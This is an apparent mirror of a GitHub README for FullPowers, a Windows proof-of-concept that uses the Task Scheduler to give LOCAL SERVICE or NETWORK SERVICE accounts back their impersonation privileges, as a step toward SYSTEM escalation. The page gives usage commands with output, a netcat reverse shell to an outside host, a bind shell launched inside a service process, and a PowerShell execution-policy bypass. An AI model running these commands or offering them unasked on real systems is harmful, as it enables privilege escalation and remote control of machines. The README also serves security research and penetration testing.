GithubHelp home page GithubHelp logo

dsb4 / fullpowers Goto Github PK

View Code? Open in Web Editor NEW

This project forked from itm4n/fullpowers

0.0 1.0 0.0 417 KB

Recover the default privilege set of a LOCAL/NETWORK SERVICE account

Home Page: https://itm4n.github.io/localservice-privileges/

C++ 99.47% C 0.53%

fullpowers's Introduction

FullPowers

FullPowers is a Proof-of-Concept tool I made for automatically recovering the default privilege set of a service account including SeAssignPrimaryToken and SeImpersonate.

Rationale

On Windows, some services executed as LOCAL SERVICE or NETWORK SERVICE are configured to run with a restricted set of privileges. Therefore, even if the service is compromised, you won't get the golden impersonation privileges and privilege escalation to LOCAL SYSTEM should be more complicated. However, I found that, when you create a scheduled task, the new process created by the Task Scheduler Service has all the default privileges of the associated user account (except SeImpersonate). Therefore, with some token manipulations, you can spawn a new process with all the missing privileges.

For more information: https://itm4n.github.io/localservice-privileges/

Usage

โš ๏ธ This tool should be executed as LOCAL SERVICE or NETWORK SERVICE only.

You can check the help message using the -h option.

c:\TOOLS>FullPowers -h

FullPowers v0.1 (by @itm4n)

  This tool leverages the Task Scheduler to recover the default privilege set of a service account.
  For more information: https://itm4n.github.io/localservice-privileges/

Optional arguments:
  -v              Verbose mode, used for debugging essentially
  -c <CMD>        Custom command line to execute (default is 'C:\Windows\System32\cmd.exe')
  -x              Try to get the extended set of privileges (might fail with NETWORK SERVICE)
  -z              Non-interactive, create a new process and exit (default is 'interact with the new process')

Example 1, basic usage

c:\TOOLS>FullPowers
[+] Started dummy thread with id 9976
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.19041.84]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>

Example 2, specify a custom command line

c:\TOOLS>FullPowers -c "powershell -ep Bypass"
[+] Started dummy thread with id 9028
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\WINDOWS\system32> Get-ExecutionPolicy
Bypass

Example 3, start a netcat reverse shell and exit

c:\TOOLS>FullPowers -c "C:\TOOLS\nc64.exe 1.2.3.4 1337 -e cmd" -z
[+] Started dummy thread with id 5482
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK

How-To

You want to test this PoC yourself? That's great! Here are some simple instructions to get you started.

The overall idea is to start a bindshell from the process of an existing service, connect to it and then run the executable.

  1. You'll need 2 third-party tools, netcat and RunFromProcess.
  2. Pick a service which has limited privileges, e.g.: upnphost.
  3. Open the Task Manager, go to the Services tab and get the PID of the corresponding process.
  4. Use the following command to start the bindshell as an administrator:
C:\TOOLS>RunFromProcess-x64.exe <PID> C:\TOOLS\nc64.exe -l -p 9001 -e cmd
  1. Use the following command to connect to the bindshell:
C:\TOOLS>nc64.exe 127.0.0.1 9001
Microsoft Windows [Version 10.0.19041.84]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\local service

C:\WINDOWS\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name          Description              State
======================= ======================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects    Enabled
  1. We can see that the current process has no impersonation privileges. Now run the PoC...
c:\TOOLS>FullPowers
[+] Started dummy thread with id 5568
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.19041.84]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\local service

C:\WINDOWS\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled

You should now have a shell with impsersonation privileges!

fullpowers's People

Contributors

itm4n avatar

Watchers

avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.